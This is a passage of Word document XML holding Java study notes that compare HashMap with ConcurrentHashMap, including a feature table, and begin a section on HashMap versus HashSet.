        <w:t xml:space="preserve">. It will </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not throw an exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the map is modified while iterating (in some cases, modifications are visible to the iterator).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54043320" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0077291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2434058">
          <v:rect id="_x0000_i1556" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="402A28DE" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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7. Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6EA91D" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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HashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5A768F" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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when thread safety is not a concern (single-threaded or externally synchronized environments).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25830832" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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deal for non-concurrent, fast lookups in single-threaded applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDE1B24" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C3F7AB" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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in concurrent applications where multiple threads are accessing or modifying the map at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E010875" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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deal for multi-threaded scenarios where you need thread-safe operations without sacrificing performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AE1FDB" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0077291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086C5A">
          <v:rect id="_x0000_i1557" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B090CF8" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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8. Bulk Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15435BF7" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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p>
    <w:p w14:paraId="542BCC59" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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oes not provide built-in methods for atomic operations, such as putIfAbsent(), remove(), or replace().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4B6653" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA13885" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Provides atomic operations like putIfAbsent(), replace(), remove(), and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compute operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like computeIfAbsent(), computeIfPresent()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16023344" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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se operations ensure thread-safe, atomic changes to the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D756F5F" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0077291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3318040">
          <v:rect id="_x0000_i1558" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3E8E24" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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3"/>
        <w:gridCol w:w="4162"/>
        <w:gridCol w:w="4529"/>
      </w:tblGrid>
      <w:tr w:rsidR="0077291C" w:rsidRPr="00CE4B95" w14:paraId="5206F993" w14:textId="77777777" w:rsidTr="005A02C9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73DFD404" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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6CD58E98" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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ashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57CC41D9" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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urrentHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0077291C" w:rsidRPr="00CE4B95" w14:paraId="19354BBC" w14:textId="77777777" w:rsidTr="005A02C9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70A14AC6" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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 Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76BE8DFB" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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t thread-safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0759C05C" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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read-safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0077291C" w:rsidRPr="00CE4B95" w14:paraId="60722388" w14:textId="77777777" w:rsidTr="005A02C9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CA73B9F" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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cking Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26A711D0" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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internal locking (external sync needed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7263243D" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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ne-grained locks (bucket-level)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0077291C" w:rsidRPr="00CE4B95" w14:paraId="15042D40" w14:textId="77777777" w:rsidTr="005A02C9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15C9FD7D" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="010E592A" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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aster in single-threaded apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E7F4EF1" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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ptimized for high concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0077291C" w:rsidRPr="00CE4B95" w14:paraId="6132773A" w14:textId="77777777" w:rsidTr="005A02C9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C48A9FB" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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ull Keys/Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AADED71" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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lows null key and value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D7AF5BF" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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oes not allow null key/value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0077291C" w:rsidRPr="00CE4B95" w14:paraId="14D5C74B" w14:textId="77777777" w:rsidTr="005A02C9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6814D9EA" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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terator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02F8CACA" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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ail-fast</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D8866A0" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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ail-safe (no ConcurrentModificationException)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0077291C" w:rsidRPr="00CE4B95" w14:paraId="5014D93D" w14:textId="77777777" w:rsidTr="005A02C9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="684B5771" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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ulk Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D668A08" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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t supported</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51CA11AC" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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pports atomic operations like putIfAbsent(), replace(), remove(), etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0077291C" w:rsidRPr="00CE4B95" w14:paraId="19B21822" w14:textId="77777777" w:rsidTr="005A02C9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ADEC643" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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ase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F68CEA8" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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gle-threaded or externally synchronized environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52CCE676" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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ulti-threaded applications requiring high concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0077291C" w:rsidRPr="00CE4B95" w14:paraId="68EBA77A" w14:textId="77777777" w:rsidTr="005A02C9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60548CF8" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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ize of the map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26B0DDE9" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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y require external synchronization to handle large maps in concurrent environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A3E08FC" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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ndles large maps efficiently in concurrent environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3384DDCB" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0077291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D1202FF">
          <v:rect id="_x0000_i1559" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3D92DC" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">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to Use Each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5437BACB" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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HashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7905D269" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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working in single-threaded environments or if external synchronization (e.g., using synchronizedMap) is acceptable for multi-threading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F661016" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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thread safety is not a concern and you need a fast, non-synchronized map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39840544" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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oncurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CAE37D" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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working in multi-threaded environments where multiple threads will read and write concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A85E776" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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thread safety is important but you want to avoid the overhead of locking the entire map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0D646C" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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situations where high concurrency, atomic operations, and fail-safe iteration are needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BB592C" w14:textId="270C6372"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FB7BE4C">
          <v:rect id="_x0000_i1560" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C26666" w14:textId="3EAD4125" w:rsidR="00546A70" w:rsidRPr="00CE4B95" w:rsidRDefault="00546A70">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="182" w:name="_Toc196307662"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between HashMap and HashSet</w:t>
      </w:r>
      <w:r w:rsidR="005A02C9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="182"/>
    </w:p>
    <w:p w14:paraId="139ADEE2" w14:textId="31E169EA" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">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hMap and HashSet are both part of the Java Collections Framework, but they are used for different purposes and have different internal structures. Here are the key differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37652D2A" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00060E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1641ED8">
          <v:rect id="_x0000_i1561" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F826C6A" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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Data Structure and Purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0985F547" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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p>
    <w:p w14:paraId="731F654E" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Key-Value Pair</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HashMap stores data in the form of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key-value pairs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Each entry in the map consists of a key and a corresponding value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167E4A3D" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is used when you need to associate a unique key with a specific value (e.g., looking up a value based on a key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F2C507" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7D603B" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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nique Elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HashSet stores only unique </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
